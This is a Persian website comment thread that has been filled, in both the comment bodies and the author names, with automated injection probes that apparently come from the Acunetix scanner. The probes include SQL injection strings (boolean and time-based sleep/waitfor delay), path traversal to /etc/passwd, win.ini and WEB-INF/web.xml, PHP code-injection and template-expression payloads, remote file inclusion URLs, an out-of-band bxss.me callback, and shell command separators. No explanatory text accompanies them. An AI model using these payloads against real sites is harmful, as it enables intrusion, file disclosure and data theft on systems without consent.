jxljeawn در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۹نوشت:

TicketBtn=ثبت نظر

set|set&set در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۰۰نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۰۱نوشت:

-1 OR 3*2>(0+5+711-711)

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۰۱نوشت:

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'set|set&set' در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۰۲نوشت:

1

einddjoq در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۰۲نوشت:

${9999731+10000438}

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۰۲نوشت:

/../..//../..//../..//../..//../..//etc/passwd\0.jpg

"set|set&set" در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۰۲نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۰۲نوشت:

-1' OR 2+619-619-1=0+0+0+1 --

jxljeawn در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۰۳نوشت:

einddjoq در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۰۳نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۰۳نوشت:

.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/passwd

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۰۴نوشت:

-1' OR 3+619-619-1=0+0+0+1 --

jxljeawn در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۰۵نوشت:

${10000331+9999570} در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۰۵نوشت:

1

set|set&set در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۰۶نوشت:

1

jxljeawn در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۰۶نوشت:

1

`set|set&set` در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۰۷نوشت:

1

faxjfbai در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۰۸نوشت:

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۰۸نوشت:

-1' OR 3*2<(0+5+619-619) --

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۰۹نوشت:

/etc/passwd

;set|set&set; در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۰۹نوشت:

1

faxjfbai در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۰نوشت:

1some_inexistent_file_with_long_name\0.jpg

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۰نوشت:

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۱نوشت:

-1' OR 3*2>(0+5+619-619) --

jxljeawn در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۱نوشت:

1

faxjfbai در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۲نوشت:

Http://testasp.vulnweb.com/t/fit.txt

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۲نوشت:

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۲نوشت:

-1" OR 2+687-687-1=0+0+0+1 --

qqvsxqvt در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۳نوشت:

VGJyUDYxQTlFMjVYNTBnWWRwcU9vZFJFT0JSdVhhNWRMM1dyblpGOXhUbVc4b3lkZQ==

faxjfbai در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۳نوشت:

http://testasp.vulnweb.com/t/fit.txt?.jpg

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۴نوشت:

jxljeawn در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۴نوشت:

1

dkoukhwe در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۴نوشت:

1&n925348=v994821

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۴نوشت:

-1" OR 3+687-687-1=0+0+0+1 --

faxjfbai در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۴نوشت:

testasp.vulnweb.com

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۵نوشت:

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

ebxjciak در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۵نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۶نوشت:

file:///etc/passwd

jxljeawn در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۶نوشت:

1

faxjfbai در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۶نوشت:

1

khnkjnva&n901000=v990834 در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۶نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۶نوشت:

-1" OR 3*2<(0+5+687-687) --

sample@email.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۷نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۷نوشت:

/\\../\\../\\../\\../\\../\\../\\../etc/passwd

faxjfbai در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۸نوشت:

1

nqotnurv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۸نوشت:

)

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۸نوشت:

-1" OR 3*2>(0+5+687-687) --

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۸نوشت:

WEB-INF/web.xml

faxjfbai در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۸نوشت:

1

nqotnurv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۹نوشت:

!(()&&!|*|*|

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۹نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۹نوشت:

WEB-INF\\web.xml

faxjfbai در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۱۹نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۰نوشت:

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

nqotnurv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۰نوشت:

^(#$!@#$)(()))******

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۰نوشت:

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۱نوشت:

1

faxjfbai در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۱نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۱نوشت:

../../../../../../../../../../windows/win.ini

nqotnurv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۱نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۱نوشت:

1 waitfor delay '0:0:9' --

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۲نوشت:

1

nqotnurv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۲نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۲نوشت:

../../../../../../../../../../boot.ini

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۲نوشت:

1

1some_inexistent_file_with_long_name\0.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۲نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۲نوشت:

OpJVz4vf'; waitfor delay '0:0:3' --

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۳نوشت:

../../../../../../../../../../windows/win.ini\0.jpg

plwldsbq در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۳نوشت:

nqotnurv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۳نوشت:

1

Http://testasp.vulnweb.com/t/fit.txt در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۳نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۴نوشت:

Nv5f3cLK'); waitfor delay '0:0:3' --

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۴نوشت:

) در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۴نوشت:

1

http://testasp.vulnweb.com/t/fit.txt?.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۴نوشت:

1

plwldsbq در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۴نوشت:

'"()

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۵نوشت:

XWkcJMIr')); waitfor delay '0:0:3' --

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۵نوشت:

................windowswin.ini

!(()&&!|*|*| در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۵نوشت:

1

testasp.vulnweb.com در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۵نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۵نوشت:

qXAepAwM';select pg_sleep(3); --

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۵نوشت:

..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini

^(#$!@#$)(()))****** در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۶نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۶نوشت:

y6eDUSoV');select pg_sleep(6); --

plwldsbq در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۶نوشت:

1

fwkinnij در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۶نوشت:

;print(md5(acunetix_wvs_security_test));

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۶نوشت:

/.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./windows/win.ini

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۷نوشت:

Dfmbl7DD'));select pg_sleep(6); --

iwbqutgq در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۷نوشت:

http://testasp.vulnweb.com/t/xss.html?%00.jpg

plwldsbq در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۷نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۷نوشت:

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

fwkinnij در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۷نوشت:

';print(md5(acunetix_wvs_security_test));$a='

iwbqutgq در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۸نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۸نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۸نوشت:

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۸نوشت:

1

fwkinnij در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۸نوشت:

";print(md5(acunetix_wvs_security_test));$a="

http://testasp.vulnweb.com/t/xss.html?%00.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۹نوشت:

1

'"() در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۹نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۹نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۹نوشت:

unexisting/../../../../../../../../../../windows/win.ini.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\

bseehoqj در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۲۹نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1

fwkinnij در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۰نوشت:

${@print(md5(acunetix_wvs_security_test))}

dxhjlvhw در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۰نوشت:

http://hitziS53GtGnC.bxss.me/

bseehoqj در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۰نوشت:

%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%D8%B4%D8%A8%DA%A9%D9%8714-WAPs-and-Placement

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۰نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۰نوشت:

WEB-INF/web.xml?

fwkinnij در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۴:۳۱نوشت:

${@print(md5(acunetix_wvs_security_test))}\\

